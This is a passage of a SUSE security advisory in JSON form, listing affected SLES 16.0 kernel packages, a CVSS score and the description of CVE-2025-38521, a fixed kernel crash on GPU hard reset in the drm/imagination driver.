"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38520"
},
{
"cve": "CVE-2025-38521",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38521"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
